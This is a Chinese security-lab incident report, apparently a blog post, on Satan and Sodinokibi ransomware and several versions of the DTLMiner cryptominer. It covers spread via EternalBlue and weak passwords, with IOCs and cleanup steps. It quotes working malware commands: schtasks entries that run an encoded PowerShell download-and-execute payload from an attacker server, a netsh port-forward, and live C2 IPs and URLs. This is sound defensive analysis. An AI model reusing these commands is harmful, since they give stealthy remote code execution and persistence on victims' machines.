| 关键词: 病毒 文件 powershell 服务 任务 Windows 攻击 漏洞 版本 随机 |
防护千万条,安全第一条; 补丁没打全,中毒两行泪。 近日,安全狗海青实验室接到多起客户中毒求助,经安全研究人员分析,这些病毒感染的途径90%以上都是“永恒之蓝”漏洞和弱口令爆破。 自2017年NSA”武器库”被黑客组织”影子经纪人”泄露以及WannyCry勒索病毒的爆发,“永恒之蓝”就是一个经久不息的话题,直到2019年的今天,还有大量主机因为“永恒之蓝”漏洞感染病毒。 2019年4-5月,我们所接触以及处理的病毒大多利用永恒之蓝漏洞进行传播,而在没有打过补丁的机器中,往往有多种病毒同时存在,”历史包袱”严重。不仅如此,近期的挖矿木马和勒索病毒为了对抗杀毒软件,更是频繁迭代新版本,为了抢占受害者的”算力市场”,黑客怕是早已进入了”996”。 总的来说,以安全卫道,任重而道远。 根据近期应急支撑工作总结的情况,我们把遇到的问题主要分为两大类来讨论:勒索病毒和挖矿木马。
一、勒索病毒此次发现的勒索病毒除了利用经典的永恒之蓝漏洞和弱口令爆破感染外,还利用多个中间件NDay对互联网主机进行攻击。我们在发现病毒后第一时间发出勒索病毒预警: 【高危安全预警】Sodinokibi勒索软件感染Windows服务器预警 1. Satan勒索病毒2019年4月中旬,海青实验室接到客户求助,并截获到Satan勒索病毒最新变种。该变种病毒会针对Windows系统和Linux系统进行无差别攻击。 Satan病毒在Windows电脑/服务器中,利用永恒之蓝漏洞对局域网Windows电脑进行攻击,同时攻击模块利用JBoss、Tomcat、Weblogic、Apache Struts2多个组件漏洞以及Tomcat弱口令爆破对Windows、Liunx服务器进行攻击。病毒攻击模块在对目标主机攻击成功后,将针对目标操作系统到C2下载勒索病毒主体,并对文件进行加密。目前已有多家企业中招。 病毒攻击模块对主机攻击成功后,判断目标主机操作系统类型,其次到服务器(111.90.159.106)下载相应病毒主体。Windows系统将病毒文件放在C:\fast.exe,linux系统病毒主体在/tmp/r.sh。下载成功后执行病毒文件。 病毒执行后将对本地文件加密,并对局域网主机进行横向感染。勒索信采用中文编写,看来黑客主要勒索目标是中国用户。勒索信信息如下图: 日志溯源: 查看jboss日志,发现从2019-04-xx 02:55:51开始一直有恶意利用jboss漏洞的exp在对中毒机器进行攻击: 初步分析,最后利用成功的应该是一个jboss反序列化漏洞: 攻击成功后,上传jsp文件satan.jsp。该文件如上文:根据系统从c2下载勒索软件本体并执行。 防范措施 对于勒索病毒,我们只能尽量防范。因为一旦中招,除了支付赎金,能解密的几率非常小,因此防范和中毒后的处理是重点。 1、及时升级操作系统安全补丁,升级Web、数据库等服务程序,防止病毒利用漏洞传播。 IOCs: 111.90.159.106 2、Sodinokibi勒索病毒该病毒家族最早出现于2019年4月下旬,其传播和利用手法丰富,短期内版本更新迭代快。目前应急的客户中,嘉兴、泸州都有中此病毒的案例。 传播途径 1) 该病毒利用3389弱口令爆破 Sodinokibi勒索软件感染服务器成功后会生成文件加密后缀名+readme.txt的勒索信息,勒索信息包括个人的ID序列号,以及恶意软件作者的联系方式。有趣的是最初的曝光者Cisco Talos团队披露的攻击者勒索信息开头显示的是“Hello Dear friend”,而此处使用的是“Welcome Again”,不排除攻击者实施攻击的过程中有二次投递勒索软件的行为。 防范措施 1、Weblogic、Apache Struts2等服务器组件及时安装安全补丁,更新到最新版本。 IOCs MD5:e62c896825a6d186f34fb16b1f57490a
二、挖矿木马1、死灰复燃的DTLMiner家族挖矿木马该家族病毒自”驱动人生”事件后开始活跃。从入侵“驱动人生”植入挖矿病毒升级插件到对自身病毒更新频率、持久化机制的改变、对抗杀软的手法来看,我们认为该团伙是一个“渗透经验丰富”同时具备较强的反侦察能力的职业黑产团伙。 我们先来回顾一下该团伙搞的“大新闻”。 2018年12月14日,“驱动人生”的升级模块被不法分子利用传播挖矿木马病毒“DTLMiner”,短期内感染数万台计算机。 驱动人生升级推送程序会通过网址链接Http://pull.update.ackng.com/calendar/PullExecute/F79CB9D2893B254CC75DFB7F3E454A69.exe将病毒下载到本地执行。 该病毒运行后,将自身释放到System32(或SysWOW64)目录下(C:WindowsSysWOW64svhost.exe),将该可执行文件注册为系统服务继续执行恶意代码,注册服务名为Ddriver。 svhost.exe为永恒之蓝漏洞攻击组件,执行之后会对内网具有永恒之蓝漏洞和弱口令的主机进行横向传播,并从http://dl.haqo.net 下载攻击组件执行。(下载的文件即为该svhost.exe)。此外,该svhost进程还将搜集主机信息,发送到服务器http://i.haqo.net/i.png 除了攻击、感染、信息搜集外,此时该病毒还未触发其他恶意行为,初步推测该病毒属于测试阶段。下面将盘点该DTLMiner家族各版本中对抗杀软的手法变化,并给予对应的清除方案。 1.1 版本1-文件增肥 病毒采取落地PE文件形式,文件名是随机的,木马在生成过程中会在文件末尾填充垃圾数据,生成50M左右的大文件来逃避特征查杀。 该木马启动后会在多个系统目录下释放增肥的木马文件,以随机的方式生成的文件名。 C:\windows; 通过schtasks 创建任务计划: schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN <随机名> /tr “cmd.exe /c C:\Windows\<随机名>.exe” 通过注册表启动项添加开机自启,并把C:/Users/admin/AppData/Roaming目录下的增肥木马当作启动程序: HKEY_LOCAL_MACHINESOFTWAREMicrisiftWindowsCurrentVersionRun 清除方案 删除病毒文件: C:\Windows\Temp\sartpg.exe 删除以下计划任务: 随机名 删除菜单启动项下的病毒文件: C:UsersgouchenAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup随机名.exe 删除注册表中的恶意启动项以及操作文件: HKEY_LOCAL_MACHINESOFTWAREMicrisiftWindowsCurrentVersionRun 1.2 版本2-服务持久化 该版本采用服务进行自身持久化,在漏洞利用成功后,创建随机名称的服务 类似客户这台机器,被多次感染后创建了多个随机的病毒服务,利用服务对自身进行持久化。 服务的可执行文件路径: C:\Windows\system32\cmd.exe /C “netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn “MicrosoftwindowsRass” /tr “powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=” /F &schtasks /run /tn “MicrosoftwindowsRass”” 清除方案 禁用该服务,遍历任务计划(不仅仅在MicrosoftwindowsRass有任务计划),清除powershell任务计划 1.3版本3-利用JS脚本执行 在攻击成功后,病毒在系统启动项释放flashplayer快捷方式,并在%appdata%释放flashplayer.tmp文件 该文件内容是一个脚本,使用JS 调用PowerShell脚本下载。 下载的模块解密后分别:设置任务计划,启动持久化机制,根据系统版本下载powershell挖矿脚本,下载攻击脚本进行横向传播 清除方案 %appdata%中的flashplayer.tmp文件 1.4 版本4-无文件落地伊始 该版本采用无文件落地形式在系统进行驻留,病毒感染成功后直接创建如下任务计划 schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn “MicrosoftwindowsRass” /tr “powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=” /F &schtasks /run /tn “MicrosoftwindowsRass” 同样的,这些任务计划从黑客服务器中下载代码,并直接执行,传统的静态杀毒引擎并不能查杀它。 清除方案 遍历任务计划,清除powershell任务即可 1.5 版本5-任务计划隐藏 在版本4的基础上,利用某些windows版本对任务计划xml文件解析错误的bug,用特殊字符命名任务计划。导致在图形界面中显示不了该任务计划。 清除方案 要清除这些任务计划,到系统路径C:WindowsSystem32Tasks或C:WindowsTasks中,遍历这些xml文件,找到powershell任务相关的xml,删除。 1.6 版本6-未知持久化 个别机子新的变种中,有不明进程启动powershell,通过查看该powershell参数,确认这个是病毒启动的。但是这个powershell启动后,执行自退出,并没有进一步感染、挖矿、占用CPU。检查了一些持久化机制(计划任务、服务、启动项等没发现问题)但是定位不到启动方式。 虽然该powershell启动后自杀,并没有执行到恶意代码部分,但是不能保证后期不会再次爆发。 这个powershell 的父进程是 C:\Windows\svchost.exe,但是svchost.exe是系统的服务进程,系统服务依托了任务计划 wmi 等多个系统服务,检查了该PID下依托的服务都是正常的;用了360处理后发现360没有对这个进行查杀,但是实时监控powershell启动的参数,对类似如下参数启动的powershell进程进行阻断: 声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除 |